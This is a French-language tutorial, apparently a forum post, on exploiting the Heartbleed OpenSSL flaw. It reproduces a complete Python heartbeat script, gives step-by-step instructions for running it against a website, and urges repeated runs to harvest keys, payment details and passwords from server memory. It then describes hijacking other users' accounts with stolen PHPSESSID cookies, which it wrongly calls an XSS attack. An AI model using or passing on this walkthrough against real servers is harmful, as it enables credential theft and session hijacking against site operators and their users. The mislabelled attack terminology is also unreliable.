L'exploitation de la faille



Pour exploiter cette faille, il est indispensable d'avoir Python sur son ordinateur, sans quoi
il vous sera impossible d'utiliser le script.
Voici le lien du site officiel de Python pour vous permettre de le télécharger.
https://www.python.org/downloads/

Après avoir installer Python.
Je vous invite désormais à acceder à ce site https://gist.githubusercontent.com/akshatmittal/10279360/raw/a03e50057c1b348377e6426ebbbecc2047034529/heartbleed.py
Et à copier en entier le script puis à le coller dans un bloc-note que vous sauvegardés sur votre bureau avec ce nom
heartbleed.py

Si vous avez des problèmes pour joindre le site qui à le script, je vous l'ai mis ici.
Spoiler:
#
# Usage: python heartbleed.py <host>
#
# The author disclaims copyright to this source code.
 
import sys
import struct
import socket
import time
import select
import re
import codecs
from optparse import OptionParser
 
decode_hex = codecs.getdecoder('hex_codec')
 
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
 
def h2bin(x):
        return decode_hex(x.replace(' ', '').replace('\n', ''))[0]
 
hello = h2bin('''
        16 03 02 00  dc 01 00 00 d8 03 02 53
        43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
        bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
        00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
        00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
        c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
        c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
        c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
        c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
        00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
        03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
        00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
        00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
        00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
        00 0f 00 01 01                                  
        ''')
 
hb = h2bin(''' 
        18 03 02 00 03
        01 40 00
        ''')
 
def hexdump(s):
    for b in range(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % c for c in lin)
        pdat = ''.join(chr(c) if 32 <= c <= 126 else '.' for c in lin)
        print( '  %04x: %-48s %s' % (b, hxdat, pdat))
    print()
 
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = b''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                                return None
            rdata += data
            remain -= len(data)
    return rdata
        
 
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print( 'Unexpected EOF receiving record header - server closed connection')
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print( 'Unexpected EOF receiving record payload - server closed connection')
        return None, None, None
    print( ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
    return typ, ver, pay
 
def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print( 'No heartbeat response received, server likely not vulnerable')
            return False
 
        if typ == 24:
            print( 'Received heartbeat response:')
            hexdump(pay)
            if len(pay) > 3:
                print( 'WARNING: server returned more data than it should - server is vulnerable!')
            else:
                print( 'Server processed malformed heartbeat, but did not return any extra data.')
            return True
 
        if typ == 21:
            print( 'Received alert:')
            hexdump(pay)
            print( 'Server returned error, likely not vulnerable')
            return False
 
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print( 'Connecting...')
    sys.stdout.flush()
    s.connect((args[0], opts.port))
 
    if opts.starttls:
        re = s.recv(4096)
        if opts.debug: print( re)
        s.send(b'ehlo starttlstest\n')
        re = s.recv(1024)
        if opts.debug: print( re)
        if not b'STARTTLS' in re:
            if opts.debug: print( re)
            print( 'STARTTLS not supported...')
            sys.exit(0)
        s.send(b'starttls\n')
        re = s.recv(1024)
    
    print( 'Sending Client Hello...')
    sys.stdout.flush()
    s.send(hello)
    print( 'Waiting for Server Hello...')
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print( 'Server closed connection without sending Server Hello.')
            return
        # Look for server hello done message.
        if typ == 22 and pay[0] == 0x0E:
            break
 
    print( 'Sending heartbeat request...')
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)
 
if __name__ == '__main__':
        main()



Maintenant que vous avez le script. Il vous sufftit de lancer votre cmd.
( Windows + r ) et taper "cmd"
Et de faire cette commande :
heartbleed.py www.google.com

Attention toutefois à bien être dans l'endroit où le script est mis.
Si quand vous lancez votre cmd vous êtes dans : C:\Users\Gerard39represente\ alors vu que j'ai sauvegardé le
script sur le bureau il faudra que vous fassiez

cd Desktop


Et là, à ce moment, vous pourrez faire heartbleed.py www.google.com
Faites attention à ne pas vous trompez de chemin
Puis appuyer sur entrée pour lancer le script avec votre cmd.
Après un lapse de temps très moindre, vous obtenez ça :

Si le site n'est pas vulnérable, ça n'ira pas plus loin et vous aurais un message, sinon, ça va continuer et envoyer des informations futiles ou sensibles, c'est aléatoire ! Ici, c'est plutôt sensible : des keys, des histoires de paiements (une e-boutique), une personne compétente peut facilement y trouver son bonheur, les informations facilement exploitables sont situées dans le column de droite, voilà un screen :


Vous avez réussi ? Bravo, vous savez maintenant comment exploité cette faille ! Les données récupérées sont aléatoires, n'hésitez pas à relancer autant de fois que voulu l'attaque, vous obtiendrez des informations différentes et qui sait, des mots de passe ou d'autres choses intéressantes !

Et après ?

L'attaque précédente a donc permis de récupérer des informations. Ces informations peuvent conduire sur d'autres attaques. Je ne détaillerais rien ici mais je vais donnez un petit exemple.

Imaginons que :
J'ai utiliser cette faille sur un site hier et j'ai pu récupérer des informations émanant de cookies d'autres utilisateurs contenant, entre autre, des "PHPSESSID" soit des ID de session. Je me suis alors créer un compte sur le site en question et modifier mon cookies, j'ai ensuite changer la valeur de mon PHPSESSSID par la valeur du PHPSESSID d'un autre utilisateur que j'ai récup' via la faille = j'étais connecter sur les sessions d'autres personnes, c'est une attaque XSS. Et ce n'est qu'un exemple parmis tant d'autres !



Donc voilà, vous avez désormais appris à exploiter la faille qui à fait je pense le plus de bruit sur cette planète.